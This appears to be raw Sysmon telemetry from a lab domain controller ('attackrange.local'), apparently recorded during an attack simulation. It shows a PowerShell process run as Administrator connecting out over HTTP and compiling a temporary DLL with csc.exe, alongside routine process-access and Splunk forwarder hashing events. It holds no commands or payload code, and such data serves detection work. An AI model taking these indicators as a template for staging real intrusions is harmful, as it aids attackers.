12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a9e0|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.564{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=55D9F3C30AC3EE090EBB1CE8EBD821A3,SHA256=EA0A6D99E0F99AE59FCF6D8444F43BA407BDFAC3F81AC33C4C2B8F499AFEA99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.564{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=47E88154EA7FBB9F378458945EDCEFCD,SHA256=6ABCDE2993BAD0E5719E62B00255B6177B6322F472B68156CEDFA751EBBA7005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.470{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=73AB3BA5AC6AD7BF0C287F9F59891508,SHA256=BC3AFE7DD6637A6E0B257B9ADF7483C8F9652890F12C58C9A019635BB38D62CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.455{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AD56DFA8ECDE264AFF77DC7961B82326,SHA256=C9391B781C9B3F45106CA79C327F786B5A16FEF0CD0A8060F5A32D3C7A66BBD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.982{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=324397024DA93FB5ECC976070F4A3A2D,SHA256=D79B9129766108234CC8D1FB92A6E7A31936A9A48D78EECD6DEA853442C4B9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.904{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=64ABC676233C757A06533174C00140CC,SHA256=65BE61B16A73552C41952895D20C3EBEE70F5EBB8CF64672458C62F2B17F81B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000007863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.169{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53589-false93.184.220.29-80http 23542300x80000000000000007862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.748{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BA63A4949F0B0459C21A268F657BFD6,SHA256=4CED1247B46912EC381212E023E72DADFAADA6E2EEB42055630774469E44044E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.748{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CB224B2A1DE28616F1706D7A0567886D,SHA256=2180BEB5964B1B9D3D354CA03BF11307E2CE39E96EEA69E8AC15B1991E88DED5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.717{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=46CE0A810285647B000A3E8209C12284,SHA256=837C33A9A283A095266385AF3C1D0BCDA882B46C98F84E7F25F3F117D932754E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.670{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=79152A40A066B7A9543A33AFC5B7FF63,SHA256=A001583BEBC62103385137975292A48D466EF7616F4D3D71E73D4608E23A282E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.624{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=34BACD65A075F88328A0FD34936CB6AF,SHA256=39BCD784A1CCCB6C076712B3DC3E02E791189AFCBA11273E04E62387DA38FA8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.592{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=63F1C4E56696F6E012CDAB55BD94E997,SHA256=7FA38C503CB72AAF6046F664BEFD7FB78D93E6D0DA2D0493BEEB1AF6DCE72F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.546{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3B88F32B96EE40BECF977B6F58AF64FC,SHA256=8905B04B84817621446C4EFD0124C6FB39164893B0C9A3C9040E30863B93F646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.499{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9B76FA6FE54FE64D6977648DCB8850ED,SHA256=AEAC2A594269B1825B2BC04F23E6EB8B59B13224E36091479C4582D88BA069E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.452{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=10D84E890A5415DA3DA15650FCE8B4B5,SHA256=FB8E1737FBB6502851F26802F7387F87D9AFC0E51DC91F56189B9EFBE0CB16E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.405{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6CC1016706D2BEB97898C2F634A29D34,SHA256=C78F4915F646445A564DCEDC961DBF5F527F9D158462C915316915659B24C5CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.359{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=76FE218AE08CE1722EF8BE393BD8E7D7,SHA256=21EA602059F2E1B20B5E4144539231566883D65718FE90884B6906EDD06502AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.312{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A86093F5899F8B6A3BE44DF9AC99AFE9,SHA256=23153228FF2EFE89DF474801D5375CB904157523AC0C9B0315227D0F3320D2B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.265{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DC3E1E06072DDD184A7FFABE91158497,SHA256=13D8A0D58BCFA30555C118BCE248E09CCA46AD4B09433A21ADBBF96957D480B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.234{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C8378F9516FE8D6BC366DE9EB4E052FA,SHA256=3CDB06613416D28DC9B20035B611919AFD3DABBFF17D2AB0BABB4BAEFD50AC0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.172{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5EBAB6D12128AC7DF28901C4A46C488B,SHA256=7C93C063264CEBC63DA48517F55CFA183C747DDEFD906C6940630F76A2DD4BA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.125{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A1755121CDAB56265783C2093CBFCAB0,SHA256=C0024ADFF802B4F311B7FCF5E1A68C4F98647D9177190E66027A0D1A7AE4689C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.078{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D58D6767E38389E149A834CC9017E08F,SHA256=1F7B60EDE4CC5C6A14E01AFD5E5595AAFD178E4773C630166F1A1F1E649F45B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.031{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9110BB521D7665947C4A20A873282CC9,SHA256=612E6C36C50DD4385ED87F3D52AE195206A34198A4F81B9264E8F2DCFF33385C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dllMD5=E6277FEB16D6984A04D99821E09BA67C,SHA256=F2239651896D013AF1EBB9117FFE5F676341B81B8B44364781CC93050B7DD320,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000007891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.outMD5=B54AD6910188B1BE6A04B54BE67F9841,SHA256=90B0257F5EB50FD946ECBEE316E85991F3DAA15FAC3F697DDFDACF834A67FB3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdlineMD5=C61DEC740CDB20247F0FBD518110BD81,SHA256=66E9F5550218A6B7B896D88AE0A399E06102E0905F5E1073D0E9103459896E77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.0.csMD5=D9ACA9FFA16C22410A16DE5D5571469D,SHA256=74E86BCD8E601DAC165642F69B571B651867BE0251D7B3D9498D1F080E4D8391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E6-6064-BD00-00000000AE01}6496ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\CSCD82B1FD6BFA44FE3AD706A9C26EF4E.TMPMD5=10CDA81239B3694FA2D6928B8FF75CE9,SHA256=12733F0795F3ED58C1684B2324CDF6CB795DB3968C98F212BD7308C9BDC80E7C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:46.605{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dll2021-03-31 12:02:46.200 23542300x80000000000000007886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.605{266CAFBE-64E6-6064-BD00-00000000AE01}6496ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.605{266CAFBE-64E6-6064-BD00-00000000AE01}6496ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES16D.tmpMD5=4B6C4475E468877B5EF417C9B6536934,SHA256=973585701AB90808F44D4481764D21C004E675DDADDCA72B2155130A5AF54A46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.559{266CAFBE-64E6-6064-BE00-00000000AE01}2904ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES16D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E6-6064-BE00-00000000AE01}2904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.543{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 